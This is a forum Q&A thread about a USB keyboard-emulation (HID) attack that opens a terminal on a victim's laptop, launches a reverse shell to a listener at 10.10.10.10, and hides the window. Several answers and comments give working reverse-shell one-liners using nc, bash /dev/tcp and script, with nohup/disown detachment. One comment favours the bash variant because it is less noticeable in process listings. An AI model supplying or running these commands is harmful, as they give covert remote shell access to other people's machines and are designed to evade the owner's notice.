# Hide reverse shell window launched with HID attack

Tags: usb, reverse-shell, arduino, keyboard

**GOAL:** the attacker insert into a victim's laptop an USB which act as a keyboard. The payload opens a terminal, executes a reverse shell and **hides** the terminal.

**PROBLEM:** the tests I did locally (ubuntu 19.04, and digispark as usb) are the following:

**ONE**

terminal A `nc -e /bin/bash 10.10.10.10 8888`

terminal B `nc -vlp 8888`

Everything works, I have my shell with the prompt on the terminal B but the terminal A is not hidden.

**TWO**

terminal A `nc -e /bin/bash 10.10.10.10 8888&; disown; exit`

terminal B `nc -vlp 8888`

terminal B just hangs and terminal A is hidden

**THREE**

terminal A `nohup nc -e /bin/bash 10.10.10.10 8888&; exit`

terminal B `nc -vlp 8888`

terminal B just hangs and terminal A is hidden

**FOUR**

terminal A: I open `screen` then execute`nc -e /bin/bash 10.10.10.10 8888` , `CTRL^A` , then `d` and finally `exit`.

terminal B `nc -vlp 8888`

using `screen` everything works but I don't want to use screen because is not installed by default

**QUESTION:** is there a way (**using preinstalled tools**) to hidden the terminal without `screen` but with the same effect?

Comment: are you sure terminal b just hangs... it could be that bash is not prompting because stdin is not a tty,

Answer (score 1):

Using just bash with its inbuilt TCP capability:

```
bash -il 1<>/dev/tcp/10.10.10.10/8888 2>&1 <&1 & exit
```

Or slightly more user friendly using script from bsdutils to invoke a pty so you can have propper job control etc...

```
script /dev/null 1<>/dev/tcp/10.10.10.10/8888 2>&1 <&1 &  exit
```

Answer (score -1):

This worked. Thanks to @Chris Dodd

`nohup nc ...& disown; exit`

After the shell exits, the terminal will either logout or shutdown (depending on what kind of terminal it is), and send SIGHUP to the controlling process group, which would cause nc to exit.

Using nohup detaches from the terminal and runs nc in its own process group (so it will no longer be in the terminal's controlling process group), so the SIGHUP won't be sent to it.

Comment: your nohup contribution is a lot less valuable than @Jasens bash-fu ...

Comment: could you explain me why

Comment: `ps` listing 'nc' is curious, whereas `bash` is commonly invoked. The owner would need `ps -eww`/netstat/sockstat, or similar (rummage in /proc/) to discover any problem. @Jasens answer passes at-a-glance inspection, `nc` doesn't. I did not mean to be rude, but why mark your own nohup solution as the answer (nohup tends to drop a nohup.out log too), when @Jasen has made such a simple and excellent answer?

Comment: Because it didn't work simply. And also it is not my solution but from another user.  Now I get your point anyway. I 'll try again what Jasen suggested. Thanks

Comment: Perhaps you can use http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet